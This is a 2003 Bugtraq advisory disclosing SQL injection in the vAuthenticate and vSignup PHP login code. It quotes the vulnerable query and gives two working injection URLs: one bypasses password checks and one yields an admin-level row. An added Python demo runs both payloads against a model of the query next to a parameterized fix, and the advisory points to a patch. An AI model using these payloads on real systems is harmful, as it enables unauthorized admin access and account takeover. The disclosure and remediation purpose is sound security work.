[28505] in bugtraq


vSignup, vAuthenticate (PHP)

daemon@ATHENA.MIT.EDU (Frog Man)
Tue Jan 21 00:55:09 2003

From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 14 Jan 2003 17:38:58 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F71h1aQzHkQtMXitvVj00000f38@hotmail.com>


Information :
°°°°°°°°°°°°°
-----------------------
Product : vAuthenticate
Version : 2.8
-----------------------
Product : vSignup
Version : 2.1
-----------------------
Website : http://www.beanbug.net
Problem : SQL Injection


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
chgpwd.php :
-----------------------------------------------
<?
	if (!class_exists(auth))
	{
		include ("auth.php");
	}
		include ("authconfig.php");
		include ("check.php");
?>
-----------------------------------------------

admin/index.php :
------------------------------------------
<?
	if (!class_exists(auth))
	{
		include ("../auth.php");
	}
		include ("../authconfig.php");
		include ("../check.php");

	if ($check["level"] != 1)
	{
------------------------------------------


check.php :
------------------------------------------------------------------------
<?
	$CheckSecurity = new auth();
	$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
	if ($check == false)
	{
		// Feel free to change the error message below. Just make sure you put a "\" before
		// any double quote.
		print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF0000\">";
		print "<b>Illegal Access</b>";
		print "</font><br>";
		print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#000000\">";
		print "<b>You do not have permission to view this page.</b></font>";

		exit; // End program execution. This will disable continuation of processing the rest of the page.
	}

?>
------------------------------------------------------------------------



auth.php :
------------------------------------------------------------------------
function page_check($username, $password) {
	$query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
	$connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);

	// OLD CODE - DO NOT REMOVE
	// $result = mysql_db_query($this->DBNAME, $query);

	// REVISED CODE
	$SelectedDB = mysql_select_db($this->DBNAME);
	$result = mysql_query($query);

	$numrows = mysql_num_rows($result);
	$row = mysql_fetch_array($result);

	// CHECK IF THERE ARE RESULTS
	// Logic: If the number of rows of the resulting recordset is 0, that means that no
	// match was found. Meaning, wrong username-password combination.
	if ($numrows == 0) {
		return false;
	}
	else {
		return $row;
	}
} // End: function page_check
------------------------------------------------------------------------




Exploits :
°°°°°°°°°°
check.php takes $USERNAME and $PASSWORD straight from the request (register_globals) and page_check() pastes them into the query without escaping, so both parameters can carry SQL. Since AND binds tighter than OR, the injected OR makes the WHERE clause match rows that have nothing to do with the supplied credentials, and page_check() returns the first of them.

Pass the check in chgpwd.php without a valid password (the WHERE clause becomes uname='[username]' AND passwd='' OR ''='' AND status <> 'inactive', i.e. every active account):
http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='

Get a level 1 row back from page_check(), which satisfies the $check["level"] != 1 test in admin/index.php (the WHERE clause becomes uname='' OR ''='' AND passwd='' OR 1=1 AND level='1' AND status <> 'inactive'):
http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
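
As an added example (not code from this advisory, from beanbug.net or from the phpsecure.org patch), the following Python models page_check() against an in-memory SQLite table, feeds it the two URLs above through the same request-parameter path that register_globals provides, and puts a parameterized variant of the same query beside it. The table rows, the host name, the "alice" stand-in for [username] and the use of SQLite in place of MySQL are assumptions made for the example; the precedence rule the payloads rely on (AND binds tighter than OR) is the same in both databases.

```python
"""Model of the vAuthenticate page_check() query and the two advisory payloads."""
import sqlite3
from urllib.parse import parse_qsl, urlsplit

# Constructed sample authuser rows (an assumption: the advisory only shows the
# uname, passwd, status and level columns, not the real schema or any real data).
SAMPLE_USERS = [
    ("alice", "s3cret", "active", 2),
    ("admin", "hunter2", "active", 1),
    ("olduser", "gone", "inactive", 1),
]

# The two URLs from the advisory, with "alice" standing in for [username].
CHGPWD_URL = "http://target/chgpwd.php?USERNAME=alice&PASSWORD='%20OR%20''='"
ADMIN_URL = ("http://target/admin/index.php?USERNAME='%20OR%20''='"
             "&PASSWORD='%20OR%201=1%20AND%20level='1")


def make_db():
    """In-memory SQLite stand-in for the MySQL authuser table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE authuser (uname TEXT, passwd TEXT, status TEXT, level INTEGER)")
    conn.executemany("INSERT INTO authuser VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """Same string concatenation as page_check() in auth.php."""
    return ("SELECT * FROM authuser WHERE uname='%s' AND passwd='%s' "
            "AND status <> 'inactive'" % (username, password))


def page_check_vulnerable(conn, username, password):
    """Mirrors page_check(): no rows -> False, otherwise the first row returned."""
    rows = conn.execute(build_query(username, password)).fetchall()
    return rows[0] if rows else False


def page_check_fixed(conn, username, password):
    """Editor's hardened variant: bound parameters, so quotes in the input stay data."""
    rows = conn.execute(
        "SELECT * FROM authuser WHERE uname=? AND passwd=? AND status <> 'inactive'",
        (username, password),
    ).fetchall()
    return rows[0] if rows else False


def request_params(url):
    """What register_globals hands check.php: $USERNAME and $PASSWORD from the query string."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def run_exploit(url, page_check=page_check_vulnerable):
    """Feed one advisory URL through the chosen page_check() against fresh sample data."""
    p = request_params(url)
    return page_check(make_db(), p["USERNAME"], p["PASSWORD"])


if __name__ == "__main__":
    for url in (CHGPWD_URL, ADMIN_URL):
        p = request_params(url)
        print(build_query(p["USERNAME"], p["PASSWORD"]))
        print("  vulnerable ->", run_exploit(url))
        print("  fixed      ->", run_exploit(url, page_check_fixed))
```

Run stand-alone, the first URL makes the vulnerable check return alice's row (the first active account) although no password was given, the second returns the admin row (the only active level 1 account), and the parameterized variant returns False for both because the quote characters are compared as part of the username and password rather than parsed as SQL.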



Patches :
°°°°°°°°°
A patch can be found at http://www.phpsecure.org.



More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n



